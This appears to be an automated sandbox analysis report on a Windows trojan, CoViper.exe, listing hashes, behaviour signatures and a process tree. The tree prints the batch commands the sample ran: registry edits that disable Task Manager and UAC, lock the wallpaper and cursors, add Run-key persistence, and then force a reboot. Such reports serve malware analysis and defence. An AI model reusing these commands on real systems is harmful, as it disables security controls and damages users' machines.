Resubmissions

09-05-2023 19:22

230509-x3fn4adg58 10

09-05-2023 19:14

230509-xxsrgaff7x 10

09-05-2023 19:14

230509-xxr5yadg42 7

09-05-2023 19:14

230509-xxrt6sff7w 8

09-05-2023 19:14

230509-xxrjeaff7v 8

09-05-2023 19:14

230509-xxqxwadg39 7

09-05-2023 19:14

230509-xxql4sff7t 10

09-05-2023 19:14

230509-xxqbcadg38 7

09-05-2023 19:10

230509-xvl6xadf64 10

Analysis

  • max time kernel
    30s
  • max time network
    104s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    09-05-2023 19:14

Errors

Reason
Machine shutdown

General

  • Target

    trojan-leaks-main/CoViper.exe

  • Size

    286KB

  • MD5

    e20ee9bbbd1ebe131f973fe3706ca799

  • SHA1

    4e92e5cbe9092f94b4f4951893b5d9ca304d292c

  • SHA256

    f632b6e822d69fb54b41f83a357ff65d8bfc67bc3e304e88bf4d9f0c4aedc224

  • SHA512

    d50524992662aa84d5b4340525a25d915e91e464a725aa6851de206fd294aa7f4fcefe695ce463ce652b0a03874b75c0678b4c708d2b71f7c18804d1365d3458

  • SSDEEP

    6144:egtJZ0NSt7Jb/Is8vIfYg6KcZQV7GdRMrKUIvcgfoS3Qz89r:egWNStd7R8cYgsZK7qCrqfoS3Mcr

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe
    "C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4272
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\703E.tmp\coronavirus.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Windows\SysWOW64\attrib.exe
        attrib +H C:\COVID-19
        3⤵
        • Views/modifies file attributes
        PID:4508
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:4620
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:4748
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v wallpaper /t REG_SZ /d C:\COVID-19\wallpaper.jpg /f
        3⤵
        • Modifies registry key
        PID:4756
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2584
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v Arrow /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:4152
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v AppStarting /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:4156
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v Hand /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:4796
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d C:\COVID-19\Update.vbs /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1084
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.exe /t REG_SZ /d C:\COVID-19\run.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1884
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d C:\COVID-19\end.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:2264
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown -r -t 5
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2952
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0 /state0:0xa3ace055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:1284

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\703E.tmp\coronavirus.bat

    Filesize

    1KB

    MD5

    e9b2f5e9305dc2a39258d69264647c53

    SHA1

    87653e2ba1bf810feb472391cef4ffae82e38ea9

    SHA256

    4fd9b85eec0b49548c462acb9ec831a0728c0ef9e3de70e772755834e38aa3b3

    SHA512

    7b0ff3dde5ba6d098f970a8d09c690652607cb3f8806b942922f7b92df45b4cc788f13dd376b6d48404178a5462baddafbb61b893074b42dbf14836826af9881

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\Update.vbs

    Filesize

    156B

    MD5

    bfbafdf20dadf4e83476228f2f86e80c

    SHA1

    fcc31feb12f3ccd786b17d46c5f487c22ea74a38

    SHA256

    a1a8d79508173cf16353e31a236d4a211bdcedef53791acce3cfba600b51aaec

    SHA512

    157ba2aaa5bd715119381a593ec78ac83f2e2e35512764ec99878cd4019d87837bb96457cb2de5e64df1510cf2935aa91918c27e686a2451c095bbbaedc84321

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\cursor.cur

    Filesize

    13KB

    MD5

    21f48a9e113317b8e2b3ce5366621aa1

    SHA1

    674c0fc07675d3455780690c38f25f6fbd20b401

    SHA256

    13c4423ed872e71990e703a21174847ab58dec49501b186709b77b772ceeab52

    SHA512

    50b99a9e44b3fefce32ad729048d8491cfa403425efe84c48038ab97dbdb403fbe35dfd50a82018d180144e1c84243622f45a2b11a06e6f105f13636fff7d75b

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\end.exe

    Filesize

    47KB

    MD5

    7def1c942eea4c2024164cd5b7970ec8

    SHA1

    b2f4288577bf8f8f06a487b17163d74ebe46ab43

    SHA256

    c3f11936fe43d62982160a876cc000f906cb34bb589f4e76e54d0a5589b2fdb9

    SHA512

    87b023b8550fcb7b7948b33eb76dd8e22452669fba280b384bc2c2162d908eaa95cdac3f31136bc2aed07944cebdc22bce34f2a96ce4f40353645f5a2a94f5ce

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\mainWindow.exe

    Filesize

    148KB

    MD5

    e6ccc960ae38768664e8cf40c74a9902

    SHA1

    d29cbc92744db7dc5bb8b7a8de6e3fa2c75b9dcd

    SHA256

    b780e24e14885c6ab836aae84747aa0d975017f5fc5b7f031d51c7469793eabe

    SHA512

    a3a7fa630bafa9508b78af298893733b365e4a185a47b231fb0bfdffc4ed2adacbdbc65fd8261cdd8a589998590a82416cb21200e0eed1bcef67b7655c9b101d

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\run.exe

    Filesize

    21KB

    MD5

    b1349ca048b6b09f2b8224367fda4950

    SHA1

    44fac7dd4b9b1ccc61af4859c8104dd507e82e2d

    SHA256

    c46c3d2bea1e42b628d6988063d247918f3f8b69b5a1c376028a2a0cadd53986

    SHA512

    f1cc8116d6eb91e6ecb214ac647c7a9a4ca7d2733af3bbca68939722c11e61a33213aa8c1cc6024c0f186db9edca48006f8f13d3282c7be921b3246cba975810

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\wallpaper.jpg

    Filesize

    1KB

    MD5

    087f4545e13bd7b8e1f36c941a62f8a4

    SHA1

    f43ac7023ca49efe5509993667f04c2fbf6ac722

    SHA256

    4a17f58a8bf2b26ece23b4d553d46b72e0cda5e8668458a80ce8fe4e6d90c42d

    SHA512

    8b309437fb43ce8667ead9709fd5700b719ee46bd294c4ee4b554cd064de63b3d5165bac83e349c54491a97c8f2241dc29f92f586c5ef50689b681386dc07c31

  • memory/4272-119-0x0000000000400000-0x0000000000473000-memory.dmp

    Filesize

    460KB

  • memory/4272-141-0x0000000000400000-0x0000000000473000-memory.dmp

    Filesize

    460KB